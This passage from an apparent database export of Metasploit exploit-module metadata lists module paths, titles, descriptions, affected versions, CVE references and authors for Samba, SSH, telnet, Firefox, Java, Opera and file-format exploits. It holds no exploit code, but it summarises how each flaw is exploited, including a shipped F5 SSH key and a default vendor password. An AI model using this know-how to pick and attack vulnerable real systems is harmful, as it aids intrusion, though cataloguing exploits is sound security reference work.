Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows an attacker to trigger a heap overflow and finally execute arbitrary code with root privileges. The module uses brute force to guess the stackpivot/rop chain or the system() address and redirect flow there in order to bypass NX. The start and stop addresses for brute forcing have been calculated empirically. On the other hand the module provides the StartBrute and StopBrute options, which allow the user to configure their own addresses.","Metasploit Framework License (BSD)","t","2012-04-10 00:00:00",0,,"aggressive","t","BID-52973, CVE-2012-1182, OSVDB-81303, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-069/","Unknown, blasty, juan vazquez , mephos, sinn3r " 80,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/trans2open.rb","exploit","linux/samba/trans2open","exploit/linux/samba/trans2open","Samba trans2open Overflow (Linux x86)",500,"This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck " 81,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb","exploit","linux/ssh/f5_bigip_known_privkey","exploit/linux/ssh/f5_bigip_known_privkey","F5 BIG-IP SSH Private Key Exposure",600,"F5 ships a public/private key pair on BIG-IP appliances that allows passwordless authentication to any other BIG-IP box. 
Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root.","Metasploit Framework License (BSD)","t","2012-06-11 00:00:00",0,,"aggressive","t","CVE-2012-1493, OSVDB-82780, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell, URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt","egypt " 82,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ssh/symantec_smg_ssh.rb","exploit","linux/ssh/symantec_smg_ssh","exploit/linux/ssh/symantec_smg_ssh","Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",600,"This module exploits a default misconfiguration flaw on Symantec Messaging Gateway. The 'support' user has a known default password, which can be used to login to the SSH service, and gain privileged remote access.","Metasploit Framework License (BSD)","t","2012-08-27 00:00:00",0,,"aggressive","t","BID-55143, CVE-2012-3579, OSVDB-85028, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00, URL-https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt","Ben Williams, Stefan Viehbock, sinn3r " 83,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb","exploit","linux/telnet/telnet_encrypt_keyid","exploit/linux/telnet/telnet_encrypt_keyid","Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",500,"This module exploits a buffer overflow in the encryption option handler of the Linux BSD-derived telnet service (inetutils or krb5-telnet). 
Most Linux distributions use NetKit-derived telnet daemons, so this flaw only applies to a small subset of Linux systems running telnetd.","Metasploit Framework License (BSD)","t","2011-12-23 00:00:00",0,,"aggressive","t","BID-51182, CVE-2011-4862, EDB-18280, OSVDB-78020","Brandon Perry , Dan Rosenberg, Jaime Penalba Estebanez , hdm " 84,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_escape_retval.rb","exploit","multi/browser/firefox_escape_retval","exploit/multi/browser/firefox_escape_retval","Firefox 3.5 escape() Return Value Memory Corruption",300,"This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets.","Metasploit Framework License (BSD)","f","2009-07-13 00:00:00",0,,"passive","t","BID-35660, CVE-2009-2477, OSVDB-55846, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=503286","Simon Berry-Byrne , hdm " 85,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_queryinterface.rb","exploit","multi/browser/firefox_queryinterface","exploit/multi/browser/firefox_queryinterface","Firefox location.QueryInterface() Code Execution",300,"This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. 
This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package.","Metasploit Framework License (BSD)","f","2006-02-02 00:00:00",,,"passive","t","BID-16476, CVE-2006-0295, OSVDB-22893, URL-http://www.mozilla.org/security/announce/mfsa2006-04.html","hdm " 86,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_svg_plugin.rb","exploit","multi/browser/firefox_svg_plugin","exploit/multi/browser/firefox_svg_plugin","Firefox 17.0.1 Flash Privileged Code Injection",600,"This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG ""use"" element in the (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame's window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.","Metasploit Framework License (BSD)","f","2013-01-08 00:00:00",0,,"passive","t","CVE-2013-0757, CVE-2013-0758, URL-http://www.mozilla.org/security/announce/2013/mfsa2013-15.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=813906","Marius Mlynski, joev, sinn3r " 87,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb","exploit","multi/browser/firefox_xpi_bootstrapped_addon","exploit/multi/browser/firefox_xpi_bootstrapped_addon","Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",600,"This exploit dynamically creates a .xpi addon file. 
The resulting bootstrapped Firefox addon is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks ""install"", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be ""bootstrapped"". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.","Metasploit Framework License (BSD)","f","2007-06-27 00:00:00",1,,"passive","t","URL-http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector, URL-https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions","mihi" 88,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/itms_overflow.rb","exploit","multi/browser/itms_overflow","exploit/multi/browser/itms_overflow","Apple OS X iTunes 8.1.1 ITMS Overflow",500,"This module exploits a stack-based buffer overflow in iTunes itms:// URL parsing. It is accessible from the browser and in Safari, itms urls will be opened in iTunes automatically. Because iTunes is multithreaded, only vfork-based payloads should be used.","Metasploit Framework License (BSD)","f","2009-06-01 00:00:00",0,,"passive","t","CVE-2009-0950, OSVDB-54833, URL-http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html, URL-http://support.apple.com/kb/HT3592","Will Drewry " 89,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_atomicreferencearray.rb","exploit","multi/browser/java_atomicreferencearray","exploit/multi/browser/java_atomicreferencearray","Java AtomicReferenceArray Type Violation Vulnerability",600,"This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. 
This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.","Metasploit Framework License (BSD)","f","2012-02-14 00:00:00",0,,"passive","t","BID-52161, CVE-2012-0507, OSVDB-80724, URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx, URL-http://schierlm.users.sourceforge.net/TypeConfusion.html, URL-http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3, URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507, URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again","Jeroen Frijters, egypt , juan vazquez , sinn3r " 90,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_calendar_deserialize.rb","exploit","multi/browser/java_calendar_deserialize","exploit/multi/browser/java_calendar_deserialize","Sun Java Calendar Deserialization Privilege Escalation",600,"This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. 
The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).","Metasploit Framework License (BSD)","f","2008-12-03 00:00:00",0,,"passive","t","CVE-2008-5353, OSVDB-50500, URL-http://blog.cr0.org/2009/05/write-once-own-everyone.html, URL-http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html, URL-http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1","hdm , sf " 91,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_getsoundbank_bof.rb","exploit","multi/browser/java_getsoundbank_bof","exploit/multi/browser/java_getsoundbank_bof","Sun Java JRE getSoundbank file:// URI Buffer Overflow",500,"This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.","Metasploit Framework License (BSD)","f","2009-11-04 00:00:00",0,,"passive","t","BID-36881, CVE-2009-3867, OSVDB-59711, URL-http://zerodayinitiative.com/advisories/ZDI-09-076/","jduck , kf " 92,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_exec.rb","exploit","multi/browser/java_jre17_exec","exploit/multi/browser/java_jre17_exec","Java 7 Applet Remote Code Execution",600,"The exploit takes advantage of two issues in JDK 7: The ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for classForName back in JDK 6. 
It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can actually invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that's not always the case in JDK 6) in order to access Statement.acc's private field, modify AccessControlContext, and then disable Security Manager. Once Security Manager is disabled, we can execute arbitrary Java code. Our exploit has been tested successfully against multiple platforms, including: IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.","Metasploit Framework License (BSD)","f","2012-08-26 00:00:00",0,,"passive","t","CVE-2012-4681, OSVDB-84867, URL-http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html, URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/, URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html, URL-http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html, URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html, URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051, URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day","Adam Gowdiak, James Forshaw, jduck , juan vazquez , sinn3r " 93,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb","exploit","multi/browser/java_jre17_glassfish_averagerangestatisticimpl","exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl","Java Applet AverageRangeStatisticImpl Remote Code Execution",600,"This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 
2012. The vulnerability affects Java version 7u7 and earlier.","Metasploit Framework License (BSD)","f","2012-10-16 00:00:00",0,,"passive","t","BID-56054, CVE-2012-5076, OSVDB-86363, URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html, URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf, URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076","Unknown, juan vazquez " 94,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_jaxws.rb","exploit","multi/browser/java_jre17_jaxws","exploit/multi/browser/java_jre17_jaxws","Java Applet JAX-WS Remote Code Execution",600,"This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.","Metasploit Framework License (BSD)","f","2012-10-16 00:00:00",0,,"passive","t","BID-56054, CVE-2012-5076, OSVDB-86363, URL-http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx, URL-http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html, URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html","Unknown, juan vazquez " 95,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_jmxbean.rb","exploit","multi/browser/java_jre17_jmxbean","exploit/multi/browser/java_jre17_jmxbean","Java Applet JMX Remote Code Execution",600,"This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. 
The vulnerability affects Java version 7u10 and earlier.","Metasploit Framework License (BSD)","f","2013-01-10 00:00:00",0,,"passive","t","CVE-2013-0422, URL-http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/, URL-http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html, URL-http://pastebin.com/cUG2ayjh, US-CERT-VU-625617","Unknown, egypt , juan vazquez , sinn3r " 96,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb","exploit","multi/browser/java_jre17_jmxbean_2","exploit/multi/browser/java_jre17_jmxbean_2","Java Applet JMX Remote Code Execution",600,"This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user.","Metasploit Framework License (BSD)","f","2013-01-19 00:00:00",0,,"passive","t","BID-57726, CVE-2013-0431, OSVDB-89613, URL-http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html, URL-http://pastebin.com/QWU1rqjf, URL-http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html, URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf, URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf","Adam Gowdiak, SecurityObscurity, Unknown, juan vazquez " 97,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_method_handle.rb","exploit","multi/browser/java_jre17_method_handle","exploit/multi/browser/java_jre17_method_handle","Java Applet Method Handle Remote Code Execution",600,"This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. 
The vulnerability affects Java version 7u7 and earlier.","Metasploit Framework License (BSD)","f","2012-10-16 00:00:00",0,,"passive","t","BID-56057, CVE-2012-5088, OSVDB-86352, URL-http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf, URL-http://www.security-explorations.com/materials/se-2012-01-report.pdf","Unknown, juan vazquez " 98,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_jre17_reflection_types.rb","exploit","multi/browser/java_jre17_reflection_types","exploit/multi/browser/java_jre17_reflection_types","Java Applet Reflection Type Confusion Remote Code Execution",600,"This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play through a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically through the ActiveX control. 
Otherwise the applet is launched without click-to-play bypass.","Metasploit Framework License (BSD)","f","2013-01-10 00:00:00",0,,"passive","t","BID-59162, CVE-2013-2423, OSVDB-92348, URL-http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/b453d9be6b3f, URL-http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html, URL-http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0, URL-http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html","Jeroen Frijters, juan vazquez " 99,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_rhino.rb","exploit","multi/browser/java_rhino","exploit/multi/browser/java_rhino","Java Applet Rhino Script Engine Remote Code Execution",600,"This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)","Metasploit Framework License (BSD)","f","2011-10-18 00:00:00",0,,"passive","t","CVE-2011-3544, OSVDB-76500, URL-http://schierlm.users.sourceforge.net/CVE-2011-3544.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-305/","Edward D. Teach , Michael Schierl, juan vazquez , sinn3r " 100,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_rmi_connection_impl.rb","exploit","multi/browser/java_rmi_connection_impl","exploit/multi/browser/java_rmi_connection_impl","Java RMIConnectionImpl Deserialization Privilege Escalation",600,"This module exploits a vulnerability in the Java Runtime Environment that allows a MarshalledObject containing a custom classloader to be deserialized under a privileged context. 
The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.","Metasploit Framework License (BSD)","f","2010-03-31 00:00:00",0,,"passive","t","CVE-2010-0094, OSVDB-63484, URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html","Matthias Kaiser, Sami Koivu, egypt " 101,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_setdifficm_bof.rb","exploit","multi/browser/java_setdifficm_bof","exploit/multi/browser/java_setdifficm_bof","Sun Java JRE AWT setDiffICM Buffer Overflow",500,"This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.","Metasploit Framework License (BSD)","f","2009-11-04 00:00:00",0,,"passive","t","BID-36881, CVE-2009-3869, OSVDB-59710, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-078/","jduck " 102,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_signed_applet.rb","exploit","multi/browser/java_signed_applet","exploit/multi/browser/java_signed_applet","Java Signed Applet Social Engineering Code Execution",600,"This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the ""Publisher"" line. 
Newer JVMs display ""UNKNOWN"" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks ""run"", the applet executes with full user permissions.","Metasploit Framework License (BSD)","f","1997-02-19 00:00:00",1,,"passive","t","URL-http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf, URL-http://www.spikezilla-software.com/blog/?p=21","natron " 103,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_trusted_chain.rb","exploit","multi/browser/java_trusted_chain","exploit/multi/browser/java_trusted_chain","Java Statement.invoke() Trusted Method Chain Privilege Escalation",600,"This module exploits a vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.","Metasploit Framework License (BSD)","f","2010-03-31 00:00:00",0,,"passive","t","CVE-2010-0840, OSVDB-63483, URL-http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html","Matthias Kaiser, Sami Koivu, egypt " 104,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/java_verifier_field_access.rb","exploit","multi/browser/java_verifier_field_access","exploit/multi/browser/java_verifier_field_access","Java Applet Field Bytecode Verifier Cache Remote Code Execution",600,"This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. 
This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.","Metasploit Framework License (BSD)","f","2012-06-06 00:00:00",0,,"passive","t","BID-52161, CVE-2012-1723, OSVDB-82877, URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9, URL-http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b, URL-http://schierlm.users.sourceforge.net/CVE-2012-1723.html, URL-http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html, URL-https://bugzilla.redhat.com/show_bug.cgi?id=829373","Stefan Cornelius, juan vazquez , littlelightlittlefire, mihi, sinn3r " 105,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/mozilla_compareto.rb","exploit","multi/browser/mozilla_compareto","exploit/multi/browser/mozilla_compareto","Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution",300,"This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC.","Metasploit Framework License (BSD)","f","2005-07-13 00:00:00",0,,"passive","t","BID-14242, CVE-2005-2265, OSVDB-17968, URL-http://www.mozilla.org/security/announce/mfsa2005-50.html","Aviv Raff , hdm " 106,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/mozilla_navigatorjava.rb","exploit","multi/browser/mozilla_navigatorjava","exploit/multi/browser/mozilla_navigatorjava","Mozilla Suite/Firefox Navigator Object Code Execution",300,"This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. 
This exploit requires the Java plugin to be installed.","Metasploit Framework License (BSD)","f","2006-07-25 00:00:00",,,"passive","t","BID-19192, CVE-2006-3677, OSVDB-27559, URL-http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html, URL-http://www.mozilla.org/security/announce/mfsa2006-45.html","hdm " 107,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/opera_configoverwrite.rb","exploit","multi/browser/opera_configoverwrite","exploit/multi/browser/opera_configoverwrite","Opera 9 Configuration Overwrite",600,"Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code.","BSD License","f","2007-03-05 00:00:00",0,,"passive","t","OSVDB-66472","egypt " 108,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/opera_historysearch.rb","exploit","multi/browser/opera_historysearch","exploit/multi/browser/opera_historysearch","Opera historysearch XSS",600,"Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to modify configuration settings and execute arbitrary commands. 
Affects Opera versions between 9.50 and 9.61.","BSD License","f","2008-10-23 00:00:00",0,,"passive","t","BID-31869, CVE-2008-4696, OSVDB-49472, URL-http://www.opera.com/support/kb/view/903/","Aviv Raff , Roberto Suggi, egypt " 109,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/browser/qtjava_pointer.rb","exploit","multi/browser/qtjava_pointer","exploit/multi/browser/qtjava_pointer","Apple QTJava toQTPointer() Arbitrary Memory Access",600,"This module exploits an arbitrary memory access vulnerability in the QuickTime for Java API provided with QuickTime 7.","Metasploit Framework License (BSD)","f","2007-04-23 00:00:00",,,"passive","t","BID-23608, CVE-2007-2175, OSVDB-34178, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-023.html","ddz , hdm , kf " 110,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb","exploit","multi/fileformat/adobe_u3d_meshcont","exploit/multi/fileformat/adobe_u3d_meshcont","Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",400,"This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a specially crafted pdf that contains malformed U3D data, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-10-13 00:00:00",0,,"aggressive","t","BID-36665, CVE-2009-2990, OSVDB-58920, URL-http://sites.google.com/site/felipeandresmanzano/, URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html","Felipe Andres Manzano , jduck " 111,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/fileformat/maple_maplet.rb","exploit","multi/fileformat/maple_maplet","exploit/multi/fileformat/maple_maplet","Maple Maplet File Creation and Command Execution",600,"This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. 
All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security settings prevent code from running in a normal Maple worksheet without user interaction, but those settings do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2010-04-26 00:00:00",0,,"aggressive","t","OSVDB-64541, URL-http://www.maplesoft.com/products/maple/","scriptjunkie" 112,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/fileformat/peazip_command_injection.rb","exploit","multi/fileformat/peazip_command_injection","exploit/multi/fileformat/peazip_command_injection","PeaZip <= 2.6.1 Zip Processing Command Injection",600,"This module exploits a command injection vulnerability in PeaZip. All versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with version 2.6.1 on Windows. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with PeaZip, and access the specially crafted file via double-clicking it. By doing so, an attacker can execute arbitrary commands as the victim user.","Metasploit Framework License (BSD)","f","2009-06-05 00:00:00",0,,"aggressive","t","CVE-2009-2261, EDB-8881, OSVDB-54966, URL-http://peazip.sourceforge.net/","Nine:Situations:Group::pyrokinesis, jduck " 113,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb","exploit","multi/ftp/wuftpd_site_exec_format","exploit/multi/ftp/wuftpd_site_exec_format","WU-FTPD SITE EXEC/INDEX Format String Vulnerability",500,"This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. 
By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code.","Metasploit Framework License (BSD)","t","2000-06-22 00:00:00",0,,"aggressive","t","BID-1387, CVE-2000-0573, OSVDB-11805","jduck "
114,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/handler.rb","exploit","multi/handler","exploit/multi/handler","Generic Payload Handler",0,"This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.","Metasploit Framework License (BSD)","f",,0,,"aggressive","t",,"hdm "
115,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/activecollab_chat.rb","exploit","multi/http/activecollab_chat","exploit/multi/http/activecollab_chat","Active Collab ""chat module"" <= 2.3.8 Remote PHP Code Injection Exploit",600,"This module exploits an arbitrary code injection vulnerability in the chat module that is part of Active Collab by abusing a preg_replace() using the /e modifier and its replacement string using double quotes. The vulnerable function can be found in activecollab/application/modules/chat/functions/html_to_text.php.","Metasploit Framework License (BSD)","f","2012-05-30 00:00:00",0,,"aggressive","t","OSVDB-81966, URL-http://www.activecollab.com/downloads/category/4/package/62/releases","mr_me "
116,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb","exploit","multi/http/ajaxplorer_checkinstall_exec","exploit/multi/http/ajaxplorer_checkinstall_exec","AjaXplorer checkInstall.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script.
